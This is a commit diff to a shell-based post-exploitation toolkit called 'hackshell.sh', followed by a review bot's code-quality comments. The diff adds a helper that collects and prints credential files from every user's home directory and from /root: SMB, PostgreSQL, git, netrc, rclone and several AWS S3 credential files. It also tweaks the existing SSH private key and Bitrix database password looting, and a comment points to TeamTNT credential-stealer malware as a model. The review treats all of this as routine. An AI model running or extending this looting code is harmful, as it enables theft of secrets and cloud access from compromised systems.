
Commit f9cd33c

committed
ghostip
1 parent 7aa8be1 commit f9cd33c


1 file changed

+28
-11
lines changed


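--- a/tools/hackshell.sh
+++ b/tools/hackshell.sh
@@ -424,7 +424,7 @@ loot_sshkey() {
 grep -Fqam1 'PRIVATE KEY' "${fn}" || return
 
 setsid -w ssh-keygen -y -f "${fn}" </dev/null &>/dev/null && str="${CDR}NO PASSWORD"
-echo -e "${CB}SSH Key ${CDY}${fn}${CN} ${str}${CDY}${CF}"
+echo -e "${CB}SSH-Key ${CDY}${fn}${CN} ${str}${CDY}${CF}"
 cat "$fn"
 echo -en "${CN}"
 }
@@ -433,11 +433,26 @@ loot_bitrix() {
 local fn="${1:?}"
 [ ! -f "$fn" ] && return
 grep -Fqam1 '$_ENV[' "$fn" && return
-echo -e "${CB}Bitrix DB ${CDY}${fn}${CF}"
+echo -e "${CB}Bitrix-DB ${CDY}${fn}${CF}"
 grep --color=never -E "(host|database|login|password)'.*=" "${fn}"
 echo -en "${CN}"
 }
 
+# _loot_home <NAME> <filename>
+_loot_homes() {
+local fn
+for fn in "${HOMEDIR:-/home}"/*/"${2:?}" /root/"${2}"; do
+[ ! -s "$fn" ] && continue
+echo -e "${CB}${1:-CREDS} ${CDY}${fn}${CF}"
+cat "$fn"
+echo -en "${CN}"
+done
+}
+
+# Someone shall implement a sub-set from TeamTNT's tricks (use
+# noseyparker for cpu/time-intesive looting). TeamTNT's infos:
+# https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
+# https://www.cadosecurity.com/blog/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker
 loot() {
 local h="${_HS_HOME_ORIG:-$HOME}"
 local str
@@ -477,15 +492,17 @@ loot() {
 loot_sshkey "$fn"
 done
 
-### .config
-for fn in "${HOMEDIR:-/home}"/*/.config/rclone/rclone.conf /root/.config/rclone/rclone.conf; do
-[ ! -s "$fn" ] && continue
-echo -e "${CB}rclone ${CDY}${fn}${CF}"
-cat "$fn"
-echo -en "${CN}"
-done
-
-HS_WARN "FIXME: This is ALPHA. Needs much more..."
+_loot_homes "SMB" ".smbcredentials"
+_loot_homes "SMB" ".samba_credentials"
+_loot_homes "PGSQL" ".pgpass"
+_loot_homes "RCLONE" ".config/rclone/rclone.conf"
+_loot_homes "GIT" ".git-credentials"
+_loot_homes "AWS S3" ".s3cfg"
+_loot_homes "AWS S3" ".passwd-s3fs"
+_loot_homes "AWS S3" ".s3backer_passwd"
+_loot_homes "AWS S3" ".passwd-s3fs"
+_loot_homes "AWS S3" ".boto"
+_loot_homes "NETRC" ".netrc"
 }
 
 ws() {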
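Review bot: `_loot_homes "AWS S3" ".passwd-s3fs"` is listed twice in the new loot() body (the 7th and 9th of the added calls), so that file is printed twice per home directory; drop the second occurrence. The header comment on the new helper reads `# _loot_home <NAME> <filename>` while the function is named `_loot_homes`, so it should be `# _loot_homes <NAME> <filename>`. In `_loot_homes` the glob `"${HOMEDIR:-/home}"/*/"${2:?}"` leaves the literal pattern in `fn` when nothing matches and nullglob is not set; the `[ ! -s "$fn" ] && continue` guard happens to cover that, but a short comment on that line would make the reliance explicit. loot() starts before this hunk, in the second hunk of this commit.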
